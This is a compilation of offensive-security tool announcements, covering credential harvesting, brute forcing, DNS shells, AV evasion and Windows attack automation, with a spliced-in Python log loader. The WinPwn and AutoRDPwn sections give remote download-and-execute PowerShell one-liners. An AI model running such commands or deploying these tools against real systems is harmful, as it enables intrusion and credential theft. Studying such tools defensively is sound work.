FTPBruter – A FTP Server Brute Forcing Tool

Brute forcing tool for FTP servers. FTPBruter can work on any OS that has and supports Python 3.

Feature

Brute force a FTP server with a username or a list of usernames (that's all).

Install and Run on Linux

You have to install Python 3 first:

- Install Python 3 on Arch Linux and its distros: sudo pacman -S python3
- Install Python 3 on Debian and its distros: sudo apt install python3

    git clone https://github.com/GitHackTools/FTPBruter
    cd FTPBruter
    python3 ftpbruter.py

Install and Run on Windows

Download and run the Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.

Download and run the Git setup file from Git-scm.com and choose Use Git from Windows Command Prompt.

After that, open PowerShell or Command Prompt and enter these commands:

    git clone https://github.com/GitHackTools/FTPBruter
    cd FTPBruter
    python3 ftpbruter.py

If you don't want to install Git, you can download FTPBruter-master.zip, extract and use it.

Screenshots

Contact to coder

Website: GitHackTools.blogspot.com
Twitter: @SecureGF

To-do lists

- Check anonymous login.
- Auto-change proxy with brute force.

Download FTPBruter

Link: http://feedproxy.google.com/~r/PentestTools/~3/hudxodR8GrU/ftpbruter-ftp-server-brute-forcing-tool.html

SilkETW – Flexible C# Wrapper For ETW (Event Tracing for Windows)

SilkETW is a flexible C# wrapper for ETW. It is meant to abstract away the complexities of ETW and give people a simple interface to perform research and introspection. While SilkETW has obvious defensive (and offensive) applications, it is primarily a research tool in its current state.

For easy consumption, output data is serialized to JSON. The JSON data can either be analyzed locally using PowerShell or shipped off to 3rd party infrastructure such as Elasticsearch.

Implementation Details

Libraries

SilkETW is built on .Net v4.5 and uses a number of 3rd party libraries, as shown below. Please see LICENSE-3RD-PARTY for further details.

    ModuleId                                  Version  LicenseUrl
    --------                                  -------  ----------
    McMaster.Extensions.CommandLineUtils      2.3.2    https://licenses.nuget.org/Apache-2.0
    Microsoft.Diagnostics.Tracing.TraceEvent  2.0.36   https://github.com/Microsoft/perfview/blob/master/LICENSE.TXT
    Newtonsoft.Json                           12.0.1   https://licenses.nuget.org/MIT
    System.ValueTuple                         4.4.0    https://github.com/dotnet/corefx/blob/master/LICENSE.TXT
    YaraSharp                                 1.3.1    https://github.com/stellarbear/YaraSharp/blob/master/LICENSE

Command Line Options

Command line usage is fairly straightforward and user input is validated in the execution prologue. See the image below for further details.

JSON Output Structure

The JSON output, prior to serialization, is formatted according to the following C# struct.

    public struct EventRecordStruct
    {
        public Guid ProviderGuid;
        public List<string> YaraMatch;
        public string ProviderName;
        public string EventName;
        public TraceEventOpcode Opcode;
        public string OpcodeName;
        public DateTime TimeStamp;
        public int ThreadID;
        public int ProcessID;
        public string ProcessName;
        public int PointerSize;
        public int EventDataLength;
        public Hashtable XmlEventData;
    }

Note that, depending on the provider and the event type, you will have variable data in the XmlEventData hash table.
Sample JSON output can be seen below for "Microsoft-Windows-Kernel-Process" -> "ThreadStop/Stop".

    {
      "ProviderGuid": "22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716",
      "YaraMatch": [],
      "ProviderName": "Microsoft-Windows-Kernel-Process",
      "EventName": "ThreadStop/Stop",
      "Opcode": 2,
      "OpcodeName": "Stop",
      "TimeStamp": "2019-03-03T17:58:14.2862348+00:00",
      "ThreadID": 11996,
      "ProcessID": 8416,
      "ProcessName": "",
      "PointerSize": 8,
      "EventDataLength": 76,
      "XmlEventData": {
        "FormattedMessage": "Thread 11,996 (in Process 8,416) stopped. ",
        "StartAddr": "0x7fffe299a110",
        "ThreadID": "11,996",
        "UserStackLimit": "0x3d632000",
        "StackLimit": "0xfffff38632d39000",
        "MSec": "560.5709",
        "TebBase": "0x91c000",
        "CycleTime": "4,266,270",
        "ProcessID": "8,416",
        "PID": "8416",
        "StackBase": "0xfffff38632d40000",
        "SubProcessTag": "0",
        "TID": "11996",
        "ProviderName": "Microsoft-Windows-Kernel-Process",
        "PName": "",
        "UserStackBase": "0x3d640000",
        "EventName": "ThreadStop/Stop",
        "Win32StartAddr": "0x7fffe299a110"
      }
    }

Usage

Filter data in PowerShell

You can import JSON output from SilkETW in PowerShell using the following simple function.

    function Get-SilkData {
        param($Path)
        $JSONObject = @()
        Get-Content $Path | ForEach-Object {
            $JSONObject += $_ | ConvertFrom-Json
        }
        $JSONObject
    }

In the example below we will collect process event data from the Kernel provider and use image loads to identify Mimikatz execution. We can collect the required data with the following command.

    SilkETW.exe -t kernel -kk ImageLoad -ot file -p C:\Users\b33f\Desktop\mimikatz.json

With data in hand it is easy to sort, grep and filter for the properties we are interested in.

Yara

SilkETW includes Yara functionality to filter or tag event data.
Again, this has obvious defensive capabilities but it can just as easily be used to augment your ETW research.

In this example we will use the following Yara rule to detect Seatbelt execution in memory through Cobalt Strike's execute-assembly.

    rule Seatbelt_GetTokenInformation
    {
        strings:
            $s1 = "ManagedInteropMethodName=GetTokenInformation" ascii wide nocase
            $s2 = "TOKEN_INFORMATION_CLASS" ascii wide nocase
            $s3 = /bool\(native int,valuetype \w+\.\w+\/\w+,native int,int32,int32&/
            $s4 = "locals (int32,int64,int64,int64,int64,int32& pinned,bool,int32)" ascii wide nocase
        condition:
            all of ($s*)
    }

We can start collecting .Net ETW data with the following command. The "-yo" option here indicates that we should only write Yara matches to disk!

    SilkETW.exe -t user -pn Microsoft-Windows-DotNETRuntime -uk 0x2038 -l verbose -y C:\Users\b33f\Desktop\yara -yo matches -ot file -p C:\Users\b33f\Desktop\yara.json

We can see at runtime that our Yara rule was hit.

Note also that we are only capturing a subset of the "Microsoft-Windows-DotNETRuntime" events (0x2038), specifically: JitKeyword, InteropKeyword, LoaderKeyword and NGenKeyword.

Changelog

For details on version specific changes, please refer to the Changelog.

Download SilkETW
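To triage SilkETW output outside PowerShell, here is an added Python loader (not part of SilkETW or the original post) that reads the one-JSON-object-per-line file format described above the same way Get-SilkData does, then filters by provider/event, groups image loads per PID and pulls out the Yara-tagged records. Only the ThreadStop/Stop record is the page's own; the ImageLoad and DotNETRuntime sample lines and the "ImageName" key are constructed assumptions.

```python
import json
from dataclasses import dataclass, field
from typing import Any, Dict, Iterable, List, Optional

# Top-level keys of every SilkETW record, taken from the EventRecordStruct above.
RECORD_FIELDS = (
    "ProviderGuid", "YaraMatch", "ProviderName", "EventName", "Opcode",
    "OpcodeName", "TimeStamp", "ThreadID", "ProcessID", "ProcessName",
    "PointerSize", "EventDataLength", "XmlEventData",
)

# Constructed sample of SilkETW "-ot file" output: one JSON object per line.
# Line 1 is the ThreadStop/Stop record from the page (XmlEventData shortened);
# lines 2-3 are made up to stand in for an image load and a Yara-tagged .NET
# event; line 4 is garbage to show the loader skipping a bad line.
SAMPLE_LINES = [
    '{"ProviderGuid":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","YaraMatch":[],'
    '"ProviderName":"Microsoft-Windows-Kernel-Process","EventName":"ThreadStop/Stop",'
    '"Opcode":2,"OpcodeName":"Stop","TimeStamp":"2019-03-03T17:58:14.2862348+00:00",'
    '"ThreadID":11996,"ProcessID":8416,"ProcessName":"","PointerSize":8,'
    '"EventDataLength":76,"XmlEventData":{"TID":"11996","PID":"8416"}}',
    '{"ProviderGuid":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","YaraMatch":[],'
    '"ProviderName":"Microsoft-Windows-Kernel-Process","EventName":"ImageLoad/Start",'
    '"Opcode":1,"OpcodeName":"Start","TimeStamp":"2019-03-03T17:58:15.0000000+00:00",'
    '"ThreadID":100,"ProcessID":4242,"ProcessName":"","PointerSize":8,'
    '"EventDataLength":0,"XmlEventData":{"ImageName":"C:\\\\Windows\\\\System32\\\\kernel32.dll"}}',
    '{"ProviderGuid":"e13c0d23-ccbc-4e12-931b-d9cc2eee27e4",'
    '"YaraMatch":["Seatbelt_GetTokenInformation"],'
    '"ProviderName":"Microsoft-Windows-DotNETRuntime","EventName":"Method/LoadVerbose",'
    '"Opcode":37,"OpcodeName":"LoadVerbose","TimeStamp":"2019-03-03T17:58:16.0000000+00:00",'
    '"ThreadID":200,"ProcessID":4242,"ProcessName":"","PointerSize":8,'
    '"EventDataLength":0,"XmlEventData":{}}',
    'this line is not JSON',
]


@dataclass
class SilkEvent:
    provider: str
    event: str
    opcode: int
    timestamp: str
    pid: int
    tid: int
    yara: List[str]
    data: Dict[str, Any] = field(default_factory=dict)


def load_silk_events(lines: Iterable[str]) -> List[SilkEvent]:
    """Read SilkETW file output the way Get-SilkData does (ConvertFrom-Json per
    line), but skip unparsable or incomplete lines instead of aborting."""
    events: List[SilkEvent] = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            rec = json.loads(raw)
        except json.JSONDecodeError:
            continue
        if not isinstance(rec, dict) or any(k not in rec for k in RECORD_FIELDS):
            continue
        events.append(SilkEvent(
            provider=rec["ProviderName"], event=rec["EventName"],
            opcode=int(rec["Opcode"]), timestamp=rec["TimeStamp"],
            pid=int(rec["ProcessID"]), tid=int(rec["ThreadID"]),
            yara=list(rec["YaraMatch"]), data=dict(rec["XmlEventData"]),
        ))
    return events


def filter_events(events: Iterable[SilkEvent], provider: Optional[str] = None,
                  event_prefix: Optional[str] = None) -> List[SilkEvent]:
    """Equivalent of piping Get-SilkData into Where-Object on ProviderName and
    EventName; EventName is matched by prefix so "ImageLoad" covers Start/Stop."""
    return [e for e in events
            if (provider is None or e.provider == provider)
            and (event_prefix is None or e.event.startswith(event_prefix))]


def yara_hits(events: Iterable[SilkEvent]) -> List[SilkEvent]:
    """Records the -y scan tagged: YaraMatch is non-empty only when a rule fired."""
    return [e for e in events if e.yara]


def images_by_pid(events: Iterable[SilkEvent], key: str = "ImageName") -> Dict[int, List[str]]:
    """Group image-load events per PID. The XmlEventData key holding the image
    path is an assumption ("ImageName" in the constructed sample); pass the
    key your provider actually emits."""
    out: Dict[int, List[str]] = {}
    for e in filter_events(events, event_prefix="ImageLoad"):
        out.setdefault(e.pid, []).append(str(e.data.get(key, "")))
    return out


if __name__ == "__main__":
    evts = load_silk_events(SAMPLE_LINES)
    print(f"{len(evts)} events loaded")
    for e in yara_hits(evts):
        print(f"YARA {e.yara} pid={e.pid} {e.provider} {e.event} at {e.timestamp}")
    for pid, imgs in images_by_pid(evts).items():
        print(f"pid {pid} loaded: {imgs}")
```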

Link: http://feedproxy.google.com/~r/PentestTools/~3/BJmvoNfqSg4/silketw-flexible-c-wrapper-for-etw.html

CredsLeaker v3 – Tool to Display A Powershell Credentials Box

This script used to display a PowerShell credentials box asking the user for credentials. However, that was highly noticeable. Now it's time to utilize the Windows Security popup!

As before, the box cannot be closed (only by killing the process) and will keep checking the credentials against the DC. When validated, it will close and leak them to a web server outside.

How To:

1. Start a web server.
2. Type your server IP and port in the ps1 script.
3. Execute the batch file.

Legal

This software is provided for educational use only (also with redteamers in mind). Don't use credsleaker without mutual consent. If you engage in any illegal activity the author does not take any responsibility for it. By using this software you agree with these terms.

Download CredsLeaker

Link: http://feedproxy.google.com/~r/PentestTools/~3/9y08bFtnHNg/credsleaker-v3-tool-to-display.html

PowerShellArsenal – A PowerShell Module Dedicated To Reverse Engineering

PowerShellArsenal is a PowerShell module used to aid a reverse engineer. The module can be used to disassemble managed and unmanaged code, perform .NET malware analysis, analyze/scrape memory, parse file formats and memory structures, obtain internal system information, etc. PowerShellArsenal is comprised of the following tools:

Disassembly

Disassemble native and managed code.

- Get-CSDisassembly: Disassembles a byte array using the Capstone Engine disassembly framework.
- Get-ILDisassembly: Disassembles a raw MSIL byte array passed in from a MethodInfo object in a manner similar to that of Ildasm.

MalwareAnalysis

Useful tools when performing malware analysis.

- New-FunctionDelegate: Provides an executable wrapper for an X86 or X86_64 function.
- Invoke-LoadLibrary: Loads a DLL into the current PowerShell process.
- New-DllExportFunction: Creates an executable wrapper delegate around an unmanaged, exported function.
- Get-HostsFile: Parses a HOSTS file.
- New-HostsFileEntry: Replaces or appends an entry to a HOSTS file.
- Remove-HostsFileEntry: Removes an entry or series of entries from a HOSTS file.
- Get-AssemblyStrings: Outputs all strings from a .NET executable.
- Get-AssemblyResources: Extracts managed resources from a .NET assembly.
- Remove-AssemblySuppressIldasmAttribute: Strips a SuppressIldasmAttribute attribute from a .NET assembly.
- Get-AssemblyImplementedMethods: Returns all methods in an assembly that are implemented in MSIL.

MemoryTools

Inspect and analyze process memory.

- Get-ProcessStrings: Outputs all printable strings from the user-mode memory of a process.
- Get-VirtualMemoryInfo: A wrapper for kernel32!VirtualQueryEx.
- Get-ProcessMemoryInfo: Retrieves virtual memory information for every unique set of pages in user memory. This function is similar to the !vadump WinDbg command.
- Get-StructFromMemory: Marshals data from an unmanaged block of memory in an arbitrary process to a newly allocated managed object of the specified type.

Parsers

Parse file formats and in-memory structures.

- Get-PE: An on-disk and in-memory PE parser and process dumper.
- Find-ProcessPEs: Finds portable executables in memory regardless of whether or not they were loaded in a legitimate fashion.
- Get-LibSymbols: Displays symbolic information from Windows LIB files.
- Get-ObjDump: Displays information about Windows object (OBJ) files.

WindowsInternals

Obtain and analyze low-level Windows OS information.

- Get-NtSystemInformation: A utility that calls and parses the output of the ntdll!NtQuerySystemInformation function. This utility can be used to query internal OS information that is typically not made visible to a user.
- Get-PEB: Returns the process environment block (PEB) of a process.
- Register-ProcessModuleTrace: Starts a trace of loaded process modules.
- Get-ProcessModuleTrace: Displays the process modules that have been loaded since the call to Register-ProcessModuleTrace.
- Unregister-ProcessModuleTrace: Stops the running process module trace.
- Get-SystemInfo: A wrapper for kernel32!GetSystemInfo.

Misc

Miscellaneous helper functions.

- Get-Member: A proxy function used to extend the built-in Get-Member cmdlet. It adds the '-Private' parameter allowing you to display non-public .NET members.
- Get-Strings: Dumps strings from files in both Unicode and ASCII. This cmdlet replicates the functionality of strings.exe from Sysinternals.
- ConvertTo-String: Converts the bytes of a file to a string that has a 1-to-1 mapping back to the file's original bytes. ConvertTo-String is useful for performing binary regular expressions.
- Get-Entropy: Calculates the entropy of a file or byte array.

Lib

Libraries required by some of the RE functions.

- Capstone: The Capstone disassembly engine C# binding.
- De4dot: A powerful .NET deobfuscation and .NET PE parsing library.
- PSReflect: A module used to easily define in-memory enums, structs, and Win32 functions.
- Formatters: ps1xml files used to format the output of various PowerShellArsenal functions.

License

The PowerShellArsenal module and all individual scripts are under the BSD 3-Clause license unless explicitly noted otherwise.

Usage

Refer to the comment-based help in each individual script for detailed usage information.

To install this module, drop the entire PowerShellArsenal folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.

The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"

To use the module, type: Import-Module PowerShellArsenal

To see the commands imported, type: Get-Command -Module PowerShellArsenal

If you're running PowerShell v3 and you want to remove the annoying 'Do you really want to run scripts downloaded from the Internet' warning, once you've placed PowerShellArsenal into your module path, run the following one-liner:

    $Env:PSModulePath.Split(';') | % { if ( Test-Path (Join-Path $_ PowerShellArsenal) ) {Get-ChildItem $_ -Recurse | Unblock-File} }

For help on each individual command, Get-Help is your friend.

Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.

Script Style Guide

For all contributors and future contributors to PowerShellArsenal, I ask that you follow this style guide when writing your scripts/modules.

- Avoid Write-Host at all costs. PowerShell functions/cmdlets are not command-line utilities! Pull requests containing code that uses Write-Host will not be considered. You should output custom objects instead. For more information on creating custom objects, read these articles:
  http://blogs.technet.com/b/heyscriptingguy/archive/2011/05/19/create-custom-objects-in-your-powershell-script.aspx
  http://technet.microsoft.com/en-us/library/ff730946.aspx
- If you want to display relevant debugging information to the screen, use Write-Verbose. The user can always just tack on '-Verbose'.
- Always provide descriptive, comment-based help for every script. Also, be sure to include your name and a BSD 3-Clause license (unless there are extenuating circumstances that prevent the application of the BSD license).
- Make sure all functions follow the proper PowerShell verb-noun agreement. Use Get-Verb to list the default verbs used by PowerShell. Exceptions to supported verbs will be considered on a case-by-case basis.
- I prefer that variable names be capitalized and be as descriptive as possible.
- Provide logical spacing in between your code. Indent your code to make it more readable.
- If you find yourself repeating code, write a function.
- Catch all anticipated errors and provide meaningful output. If you have an error that should stop execution of the script, use 'Throw'. If you have an error that doesn't need to stop execution, use Write-Error.
- If you are writing a script that interfaces with the Win32 API, try to avoid compiling C# inline with Add-Type. Try to use the PSReflect module, if possible.
- Do not use hardcoded paths. A script should be usable right out of the box. No one should have to modify the code unless they want to.
- PowerShell v2 compatibility is highly desired.
- Use positional parameters and make parameters mandatory when it makes sense to do so. For example, I'm looking for something like the following: [Parameter(Position = 0, Mandatory = $True)]
- Don't use any aliases unless it makes sense for receiving pipeline input. They make code more difficult to read for people who are unfamiliar with a particular alias.
- Try not to let commands run on for too long. For example, a pipeline is a natural place for a line break.
- Don't go overboard with inline comments. Only use them when certain aspects of the code might be confusing to a reader.
- Rather than using Out-Null to suppress unwanted/irrelevant output, save the unwanted output to $null. Doing so provides a slight performance enhancement.
- Use default values for your parameters when it makes sense. Ideally, you want a script that will work without requiring any parameters.
- Explicitly state all required and optional dependencies in the comment-based help for your function. All library dependencies should reside in the 'Lib' folder.
- If a script creates complex custom objects, include a ps1xml file that will properly format the object's output. ps1xml files are stored in Lib\Formatters.

Download PowerShellArsenal

Link: http://www.kitploit.com/2019/04/powershellarsenal-powershell-module.html

Commando VM – The First of Its Kind Windows Offensive Distribution

Welcome to CommandoVM, a fully customized, Windows-based security distribution for penetration testing and red teaming.

Installation (Install Script)

Requirements

- Windows 7 Service Pack 1 or Windows 10
- 60 GB Hard Drive
- 2 GB RAM

Instructions

1. Create and configure a new Windows Virtual Machine.
2. Ensure the VM is updated completely. You may have to check for updates, reboot, and check again until no more remain.
3. Take a snapshot of your machine!
4. Download and copy install.ps1 to your newly configured machine.
5. Open PowerShell as an Administrator.
6. Enable script execution by running the following command:
       Set-ExecutionPolicy Unrestricted
7. Finally, execute the installer script as follows:
       .\install.ps1
   You can also pass your password as an argument: .\install.ps1 -password

The script will set up the Boxstarter environment and proceed to download and install the Commando VM environment. You will be prompted for the administrator password in order to automate host restarts during installation. If you do not have a password set, hitting enter when prompted will also work.

Installing a new package

Commando VM uses the Chocolatey Windows package manager. It is easy to install a new package. For example, enter the following command as Administrator to deploy Github Desktop on your system:

    cinst github

Staying up to date

Type the following command to update all of the packages to the most recent version:

    cup all

Installed Tools

Active Directory Tools
- Remote Server Administration Tools (RSAT)
- SQL Server Command Line Utilities
- Sysinternals

Command & Control
- Covenant
- PoshC2
- WMImplant
- WMIOps

Developer Tools
- Dep
- Git
- Go
- Java
- Python 2
- Python 3 (default)
- Visual Studio 2017 Build Tools (Windows 10)
- Visual Studio Code

Evasion
- CheckPlease
- Demiguise
- DotNetToJScript
- Invoke-CradleCrafter
- Invoke-DOSfuscation
- Invoke-Obfuscation
- Invoke-Phant0m
- Not PowerShell (nps)
- PS>Attack
- PSAmsi
- Pafishmacro
- PowerLessShell
- PowerShdll
- StarFighters

Exploitation
- ADAPE-Script
- API Monitor
- CrackMapExec
- CrackMapExecWin
- DAMP
- Exchange-AD-Privesc
- FuzzySec's PowerShell-Suite
- FuzzySec's Sharp-Suite
- Generate-Macro
- GhostPack
  - Rubeus
  - SafetyKatz
  - Seatbelt
  - SharpDPAPI
  - SharpDump
  - SharpRoast
  - SharpUp
  - SharpWMI
- GoFetch
- Impacket
- Invoke-ACLPwn
- Invoke-DCOM
- Invoke-PSImage
- Invoke-PowerThIEf
- Kali Binaries for Windows
- LuckyStrike
- MetaTwin
- Metasploit
- Mr. Unikod3r's RedTeamPowershellScripts
- NetshHelperBeacon
- Nishang
- Orca
- PSReflect
- PowerLurk
- PowerPriv
- PowerSploit
- PowerUpSQL
- PrivExchange
- Ruler
- SharpExchangePriv
- SpoolSample
- UACME
- impacket-examples-windows
- vssown

Information Gathering
- ADACLScanner
- ADExplorer
- ADOffline
- ADRecon
- BloodHound
- Get-ReconInfo
- GoWitness
- Nmap
- PowerView (Dev branch included)
- SharpHound
- SharpView
- SpoolerScanner

Networking Tools
- Citrix Receiver
- OpenVPN
- Proxycap
- PuTTY
- Telnet
- VMWare Horizon Client
- VMWare vSphere Client
- VNC-Viewer
- WinSCP
- Windump
- Wireshark

Password Attacks
- ASREPRoast
- CredNinja
- DSInternals
- Get-LAPSPasswords
- Hashcat
- Internal-Monologue
- Inveigh
- Invoke-TheHash
- KeeFarce
- KeeThief
- LAPSToolkit
- MailSniper
- Mimikatz
- Mimikittenz
- RiskySPN
- SessionGopher

Reverse Engineering
- DNSpy
- Flare-Floss
- ILSpy
- PEview
- Windbg
- x64dbg

Utilities
- 7zip
- Adobe Reader
- AutoIT
- Cmder
- CyberChef
- Gimp
- Greenshot
- Hashcheck
- Hexchat
- HxD
- Keepass
- MobaXterm
- Mozilla Thunderbird
- Neo4j Community Edition
- Pidgin
- Process Hacker 2
- SQLite DB Browser
- Screentogif
- Shellcode Launcher
- Sublime Text 3
- TortoiseSVN
- VLC Media Player
- Winrar
- yEd Graph Tool

Vulnerability Analysis
- Egress-Assess
- Grouper2
- zBang

Web Applications
- Burp Suite
- Fiddler
- Firefox
- OWASP Zap

Wordlists
- FuzzDB
- PayloadsAllTheThings
- SecLists

Download Commando-Vm

Link: http://feedproxy.google.com/~r/PentestTools/~3/7vdMiUOLgeU/commando-vm-first-of-its-kind-windows.html

WinPwn – Automation For Internal Windows Penetrationtest

In many past internal penetration tests I often had problems with the existing PowerShell recon / exploitation scripts due to missing proxy support. For this reason I wrote my own script with automatic proxy recognition and integration. The script is mostly based on other well-known large offensive security PowerShell projects. I only load them one after the other into RAM via IEX DownloadString and partially automate the execution to save time.

Yes, it is not C# and it may be flagged by antivirus solutions. Windows Defender for example blocks some of the known scripts/functions.

Different local recon modules, domain recon modules, privilege escalation and exploitation modules. Any suggestions, feedback and comments are welcome!

Just import the modules with "Import-Module .\WinPwn_v0.7.ps1" or with:

    iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn_v0.7.ps1')

Functions available after import:

- WinPwn -> Guides the user through all functions/modules with simple questions.
- Inveigh -> Executes Inveigh in a new console window (https://github.com/Kevin-Robertson/Inveigh), SMB-Relay attacks with session management afterwards.
- sessionGopher -> Executes SessionGopher and asks for parameters (https://github.com/Arvanaghi/SessionGopher)
- Mimikatzlocal -> Executes Invoke-WCMDump and Invoke-Mimikatz (https://github.com/PowerShellMafia/PowerSploit)
- localreconmodules -> Executes Get-Computerdetails and Just another Windows Privilege escalation script + Winspect (https://github.com/PowerShellMafia/PowerSploit, https://github.com/A-mIn3/WINspect, https://github.com/411Hall/JAWS)
- JAWS -> Just another Windows Privilege Escalation script gets executed.
- domainreconmodules -> Different PowerView situational awareness functions get executed and the output stored on disk. In addition a user list for DomainPasswordSpray gets stored on disk. An AD report is generated in CSV files (or XLS if Excel is installed) with ADRecon. (https://github.com/sense-of-security/ADRecon, https://github.com/PowerShellMafia/PowerSploit, https://github.com/dafthack/DomainPasswordSpray)
- Privescmodules -> Executes different privesc scripts in memory (Sherlock https://github.com/rasta-mouse/Sherlock, PowerUp, GPP-Files, WCMDump)
- lazagnemodule -> Downloads and executes lazagne.exe (if not detected by AV) (https://github.com/AlessandroZ/LaZagne)
- latmov -> Searches for systems with admin access in the domain for lateral movement. Mass-Mimikatz can be used afterwards for the found systems. DomainPasswordSpray for new credentials can also be used here.
- empirelauncher -> Launch PowerShell Empire one-liner on remote systems (https://github.com/EmpireProject/Empire)
- shareenumeration -> Invoke-Filefinder and Invoke-Sharefinder from PowerView (PowerSploit)
- groupsearch -> Get-DomainGPOUserLocalGroupMapping – find systems where you have admin access or RDP access to via Group Policy mapping (PowerView / PowerSploit)
- Kerberoasting -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking
- isadmin -> Checks for local admin access on the local system
- Sharphound -> Downloads SharpHound and collects information for the BloodHound DB
- adidnswildcard -> Creates an Active Directory-integrated DNS wildcard record and runs Inveigh for mass hash gathering. (https://blog.netspi.com/exploiting-adidns/#wildcard)

The "oBEJHzXyARrq.exe" executable is an obfuscated version of jaredhaight's PSAttack tool for AppLocker/PS-restriction bypass (https://github.com/jaredhaight/PSAttack).

Todo:

- Get the scripts from my own creds repository (https://github.com/SecureThisShit/Creds) to be independent from changes in the original repositories.
- Proxy options via PAC file are not correctly found at the moment.

Legal disclaimer:

Usage of WinPwn for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.

Download WinPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/9lPHNu1cvU8/winpwn-automation-for-internal-windows.html

LAPSToolkit – Tool To Audit And Attack LAPS Environments

Functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsoft's Local Administrator Password Solution (LAPS). It includes finding groups specifically delegated by sysadmins, finding users with "All Extended Rights" that can view passwords, and viewing all computers with LAPS enabled.

Please submit issues or comments for any problems or performance improvements. This project was created with code from an older version of PowerView.

For more information on how LAPS works see https://adsecurity.org/?p=1790.

Get-LAPSComputers: Displays all computers with LAPS enabled, password expiration, and the password if the user has access.

Find-LAPSDelegatedGroups: Searches through all OUs to see which AD groups can read the ms-Mcs-AdmPwd attribute.

Find-AdmPwdExtendedRights: Parses through ExtendedRights for each AD computer with LAPS enabled and looks for which group has read access and if any user has "All Extended Rights". Sysadmins may not be aware that users with All Extended Rights can view passwords and may be less protected than the users in the delegated groups. An example is the user which adds a computer to the domain: that user automatically receives the "All Extended Rights" permission. Since this function will parse ACLs for each AD computer, this can take very long with a larger domain.

Special thanks to Sean Metcalf (@pyrotek3), Will Schroeder (@harmj0y), Karl Fosaaen (@kfosaaen), Matt Graeber (@mattifestation) for research and code with LAPS, AD permissions, and offensive PowerShell.

Download LAPSToolkit

Link: http://feedproxy.google.com/~r/PentestTools/~3/0JNW5bf6UGc/lapstoolkit-tool-to-audit-and-attack.html

DNS-Shell – An Interactive Shell Over DNS Channel

DNS-Shell is an interactive shell over a DNS channel. The server is Python based and can run on any operating system that has Python installed; the payload is an encoded PowerShell command.

Understanding DNS-Shell

The payload is generated when the server script is invoked. It simply utilizes nslookup to perform the queries and query the server for new commands. The server then listens on port 53 for incoming communications; once the payload is executed on the target machine the server will spawn an interactive shell.

Once the channel is established the payload will continuously query the server for commands. If a new command is entered, it will execute it and return the result back to the server.

Using DNS-Shell

Running DNS-Shell is relatively simple. DNS-Shell supports two modes of operation, direct and recursive:

- Perform a git clone from our DNS-Shell GitHub page.
- DNS-Shell direct mode: sudo python DNS-Shell.py -l -d [Server IP]
- DNS-Shell recursive mode: sudo python DNS-Shell.py -l -r [Domain]

Download DNS-Shell

Link: http://www.kitploit.com/2019/03/dns-shell-interactive-shell-over-dns.html

AutoRDPwn v4.8 – The Shadow Attack Framework

AutoRDPwn is a script created in PowerShell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim's desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.

Requirements

PowerShell 4.0 or higher

Changes

Version 4.8
• Compatibility with PowerShell 4.0
• Automatic copy of the content to the clipboard (passwords, hashes, dumps, etc.)
• Automatic exclusion in Windows Defender (4 different methods)
• Remote execution without password for PsExec, WMI and Invoke-Command
• New available attack: DCOM Passwordless Execution
• New available module: Remote Access / Metasploit Web Delivery
• New module available: Remote VNC Server (designed for legacy environments)
• Autocomplete the host, user and password fields by pressing Enter
• It is now possible to run the tool without administrator privileges with the -noadmin parameter

*The rest of the changes can be consulted in the CHANGELOG file

Use

This application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords, obtain a remote shell, upload and download files or even recover the history of RDP connections or passwords of wireless networks.

One line execution:

    powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Screenshots

Credits and Acknowledgments

• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• HarmJ0y & Matt Graeber for their script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell
• Stas'M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap
• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz
• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0m

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can contact through info@darkbyte.net

Download AutoRDPwn

Link: http://www.kitploit.com/2019/03/autordpwn-v48-shadow-attack-framework.html

Phantom Evasion – Python AV Evasion Tool Capable To Generate FUD Executable Even With The Most Common 32 Bit Metasploit Payload (Exe/Elf/Dmg/Apk)

Phantom-Evasion is an interactive antivirus evasion tool written in Python, capable of generating (almost) FUD executables even with the most common 32 bit msfvenom payloads (lower detection ratio with 64 bit payloads). The aim of this tool is to make antivirus evasion an easy task for pentesters through the use of modules focused on polymorphic code and antivirus sandbox detection techniques. Since version 1.0 Phantom-Evasion also includes a post-exploitation section dedicated to persistence and auxiliary modules.

The following OSs officially support automatic setup:

- Kali Linux Rolling 2018.1+ (64 bit)
- Parrot Security (64 bit)

The following OSs are likely able to run Phantom Evasion through manual setup:

- Arch Linux (64 bit)
- BlackArch Linux (64 bit)
- Elementary (64 bit)
- Linux Mint (64 bit)
- Ubuntu 15.10+ (64 bit)
- Windows 7/8/10 (64 bit)

Contributors

Special thanks to:
- phra https://github.com/phra
- stefano118 https://github.com/stefano118

Getting Started

